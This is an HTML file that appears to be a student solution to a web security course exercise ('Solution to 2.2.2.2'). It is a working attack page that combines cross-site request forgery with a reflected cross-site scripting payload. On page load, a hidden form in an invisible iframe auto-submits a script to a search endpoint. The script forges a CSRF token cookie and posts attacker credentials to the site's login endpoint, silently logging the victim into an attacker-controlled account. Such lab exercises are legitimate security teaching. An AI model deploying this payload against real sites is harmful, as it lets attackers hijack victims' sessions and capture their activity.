<!--
xhlu15 and rwking2
Solution to 2.2.2.2
-->
<!DOCTYPE html>
<html>
    <head>
        <meta charset="utf-8">
    </head>
    <body onload = postAttack.submit()>
        <iframe name="frame" id="frame" frameborder = '0' width='0' height='0' framewidth='0' frameheight='0'></iframe>
        <form action="http://permalink.co:8080/search"  method="get"id = "postAttack" name="postAttack" target = "frame">

            <input type="hidden" name = "csrfdefense" value="1">
            <input type="hidden" name="q" value = "<script>
    document.cookie='csrf_token=13372dawg18654dccbfffaaakingbob';
    var data = {username: 'attacker', password: 'l33th4x', csrf_token: '13372dawg18654dccbfffaaakingbob'};
    function post(){
    $.post('http://permalink.co:8080/login?csrfdefense=1&xssdefense=0',data);
    return false;
    };
    post();
</script>">
        </form>
    </body>
</html>
